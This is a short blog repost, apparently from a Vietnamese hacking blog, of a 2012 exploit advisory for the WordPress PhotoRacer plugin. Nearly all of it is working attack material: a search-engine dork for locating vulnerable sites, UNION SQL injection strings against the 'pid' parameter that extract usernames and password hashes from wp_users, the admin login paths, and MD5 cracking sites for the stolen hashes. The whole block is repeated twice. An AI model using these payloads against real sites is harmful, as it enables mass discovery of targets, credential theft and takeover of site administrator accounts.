Trang chủ
»
Hacking and Security
»
SQL Injection
» WordPress PhotoRacer Plugin(Attachment) SQL Exploit
2 thg 9, 2012
WordPress PhotoRacer Plugin(Attachment) SQL Exploit
Hi aLL ! I am OrucReis
Coder ; OrucReis
Country ; TURKEY
I am tell WordPress PhotoRacer Plugin(Attachment).
I have found this vulnerability :)
I hope that is helpful...
Dork ; inurl:"mostvoted.php?pid="
Exploit ; mostvoted.php?pid=-xx union select 1,2,3,4,concat_ws(user_login,user_pass),6,7 from wp_users
OR ;
Username= mostvoted.php?pid=-xx union select 1,2,3,4,user_login,6,7 from wp_users
Password= mostvoted.php?pid=-xx union select 1,2,3,4,user_pass,6,7 from wp_users
Admin Panel= /wp-login.php , /wp-login/ , /wp-admin.php or /wp-admin/
MD5 Crack;
http://hashchecker.de
http://md5cracker.org
Coder ; OrucReis
Country ; TURKEY
I am tell WordPress PhotoRacer Plugin(Attachment).
I have found this vulnerability :)
I hope that is helpful...
Dork ; inurl:"mostvoted.php?pid="
Exploit ; mostvoted.php?pid=-xx union select 1,2,3,4,concat_ws(user_login,user_pass),6,7 from wp_users
OR ;
Username= mostvoted.php?pid=-xx union select 1,2,3,4,user_login,6,7 from wp_users
Password= mostvoted.php?pid=-xx union select 1,2,3,4,user_pass,6,7 from wp_users
Admin Panel= /wp-login.php , /wp-login/ , /wp-admin.php or /wp-admin/
MD5 Crack;
http://hashchecker.de
http://md5cracker.org
__________________
Không có nhận xét nào:
Đăng nhận xét